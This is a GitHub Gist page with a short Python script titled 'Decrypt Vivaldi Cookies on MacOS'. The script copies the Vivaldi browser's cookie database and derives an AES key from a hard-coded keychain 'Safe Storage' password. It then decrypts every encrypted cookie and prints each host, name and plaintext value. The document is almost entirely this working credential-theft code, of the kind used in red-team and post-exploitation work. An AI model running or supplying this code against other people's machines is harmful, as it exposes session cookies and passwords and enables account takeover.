Skip to content

Instantly share code, notes, and snippets.

@rxwx
Last active May 14, 2020 13:03
Show Gist options
  • Save rxwx/6fb729e8bde837272e1a157c9a23ddb8 to your computer and use it in GitHub Desktop.
Save rxwx/6fb729e8bde837272e1a157c9a23ddb8 to your computer and use it in GitHub Desktop.
Decrypt Vivaldi Cookies on MacOS
from Crypto.Cipher import AES
from Crypto.Protocol.KDF import PBKDF2
import sqlite3
import os
import shutil
def clean(x):
return x[:-ord(x[-1])]
# Make a copy of the cookie file
cookie_file = "%s/Library/Application Support/Vivaldi/Default/Cookies" % os.path.expanduser("~")
shutil.copyfile(cookie_file, './Cookies')
# Connect to the Database
conn = sqlite3.connect('./Cookies')
cursor = conn.cursor()
# Get the results
cursor.execute('SELECT host_key, name, value, encrypted_value FROM cookies')
for host_key, name, value, encrypted_value in cursor.fetchall():
try:
# Value is not v10 encrypted
if encrypted_value[:3] != "v10":
continue
# Strip v10 from the beginning
encrypted_value = encrypted_value[3:]
salt = b'saltysalt'
iv = b' ' * 16
# key is stored in the MacOS keychain under 'Vivaldi Safe Storage'
my_pass = "xWpHTrh5yRtg3FsTu5Ne5w=="
key = PBKDF2(my_pass, salt, 16, 1003)
cipher = AES.new(key, AES.MODE_CBC, IV=iv)
decrypted = cipher.decrypt(encrypted_value)
print "Host: %s\nName: %s\nDecrypted: %s\n" % (host_key, name, clean(decrypted))
except Exception as e:
print(e)
conn.commit()
conn.close()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment